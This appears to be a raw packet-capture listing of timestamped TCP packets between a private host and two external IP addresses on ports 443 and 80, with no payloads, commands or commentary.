Nov 9, 2024 09:20:26.416220903 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.416313887 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.448880911 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.448985100 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.449831963 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.449902058 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.516588926 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.516740084 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.517940044 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.518017054 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.519543886 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.519628048 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.521027088 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.521126986 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.533215046 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.533312082 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.565263033 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.565546989 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.597845078 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.597954035 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.633646011 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.633810043 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.634835958 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.634906054 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.637073040 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.637145042 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.649141073 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.649239063 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.650513887 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.650582075 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.681797981 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.681902885 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.714760065 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.714865923 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.750279903 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.750382900 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.751686096 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.751760006 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.753187895 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.753252983 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.975007057 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.975023985 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.975116014 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.976670980 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.976799965 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.978275061 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.978322983 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.979957104 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.980027914 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.981503963 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.981563091 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.983015060 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.983073950 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.983875990 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.983932972 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.984713078 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.984772921 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.986411095 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.986483097 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.987260103 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.987327099 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.988946915 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.989042044 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.989756107 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.989810944 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.990747929 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.990804911 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.992619038 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.992695093 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.993544102 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.993603945 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:26.999717951 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:26.999789000 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:27.000264883 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:27.000323057 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:27.031826973 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:27.031919956 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:27.032882929 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:27.032948017 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:27.065222979 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:27.065346956 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:27.100558043 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:27.100689888 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:27.101500034 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:27.101564884 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:27.102475882 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:27.102540970 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:27.103692055 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:27.103755951 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:27.117069960 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:27.117257118 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:27.148283958 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:27.148358107 CET	443	49704	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:27.148386955 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:27.148418903 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:27.154601097 CET	49704	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:33.266290903 CET	49705	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:33.271853924 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:33.271931887 CET	49705	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:33.277642012 CET	49705	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:33.282433033 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.319108963 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.319129944 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.319140911 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.319246054 CET	49705	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:34.319394112 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.319406986 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.319417953 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.319430113 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.319441080 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.319448948 CET	49705	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:34.319484949 CET	49705	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:34.319535971 CET	49705	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:34.320147991 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.320159912 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.320173025 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.320220947 CET	49705	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:34.320267916 CET	49705	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:34.324280024 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.324415922 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.324429035 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.324506998 CET	49705	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:34.324700117 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.324711084 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.324759007 CET	49705	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:34.324795008 CET	49705	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:34.324948072 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.325112104 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.325129986 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.325175047 CET	49705	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:34.325207949 CET	49705	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:34.325376987 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.325387955 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.325448990 CET	49705	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:34.325683117 CET	80	49705	162.55.60.2	192.168.2.5
Nov 9, 2024 09:20:34.325731993 CET	49705	80	192.168.2.5	162.55.60.2
Nov 9, 2024 09:20:41.272706985 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:41.272809982 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:41.272900105 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:41.284245968 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:41.284287930 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:42.205940008 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:42.206115961 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:42.208547115 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:42.208595037 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:42.208882093 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:42.260675907 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:42.306147099 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:42.347362995 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:42.622392893 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:42.622419119 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:42.622426987 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:42.622453928 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:42.622540951 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:42.622602940 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:42.666927099 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:42.739336014 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:42.739347935 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:42.739392042 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:42.739497900 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:42.739497900 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:42.782380104 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:42.782387018 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:42.783802032 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:42.903837919 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:42.903846979 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:42.903929949 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:42.904834986 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:42.904843092 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:42.904903889 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:43.016514063 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:43.016526937 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:43.016652107 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:43.017097950 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:43.017168999 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:43.133256912 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:43.133344889 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:43.134553909 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:43.134630919 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:43.250344038 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:43.250437975 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:43.251364946 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:43.251437902 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:43.325238943 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:43.325335026 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:43.368127108 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:43.368213892 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:43.442239046 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:43.442322969 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:43.484819889 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:43.484900951 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:43.486222982 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:43.486315966 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:43.601864100 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:43.601969004 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:43.602896929 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:43.602971077 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:43.676836967 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:43.676909924 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:43.719579935 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:43.719655037 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:43.720604897 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:43.720679998 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.060307980 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.060318947 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.060458899 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.060899019 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.061158895 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.061707020 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.062151909 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.065552950 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.065733910 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.066593885 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.066898108 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.068236113 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.068371058 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.070549965 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.070877075 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.071656942 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.071810961 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.072417974 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.072549105 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.187797070 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.187962055 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.188963890 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.189073086 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.233295918 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.233436108 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.304645061 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.304758072 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.305605888 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.305763006 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.306855917 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.307008982 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.579762936 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.579773903 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.579993010 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.580317020 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.580708027 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.582053900 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.582207918 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.583266973 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.583462954 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.583862066 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.584038019 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.584722042 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.585119963 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.586220980 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.586340904 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.656305075 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.656443119 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.657147884 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.657285929 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.657778025 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.657893896 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.658751965 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.658890009 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.773375034 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.773480892 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.774199963 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.774388075 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.775415897 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.775573015 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.776494026 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.776617050 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.890475988 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.890553951 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.891558886 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.891629934 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.892375946 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.892443895 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:44.893141985 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:44.893204927 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.216136932 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.216146946 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.216231108 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.216856003 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.216919899 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.217596054 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.217669964 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.219284058 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.219352007 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.220159054 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.220223904 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.220978022 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.221117973 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.221843004 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.221901894 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.222670078 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.222734928 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.223447084 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.223519087 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.224317074 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.224387884 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.242841959 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.242940903 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.243752956 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.243822098 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.244292021 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.244368076 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.284904957 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.284993887 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.359433889 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.359565020 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.360116005 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.360188007 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.360997915 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.361088991 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.361488104 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.361552954 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.402471066 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.402616978 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.448008060 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.448196888 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.477619886 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.477693081 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.477989912 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.478046894 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.478800058 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.478854895 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.519625902 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.519763947 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.522221088 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.522419930 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.593996048 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.594124079 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.594625950 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.594688892 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.595336914 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.595401049 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.596113920 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.596178055 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.636970043 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.637131929 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.710788012 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.710894108 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.711328983 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.711389065 CET	49713	443	192.168.2.5	185.78.221.73
Nov 9, 2024 09:20:45.712295055 CET	443	49713	185.78.221.73	192.168.2.5
Nov 9, 2024 09:20:45.712362051 CET	49713	443	192.168.2.5	185.78.221.73
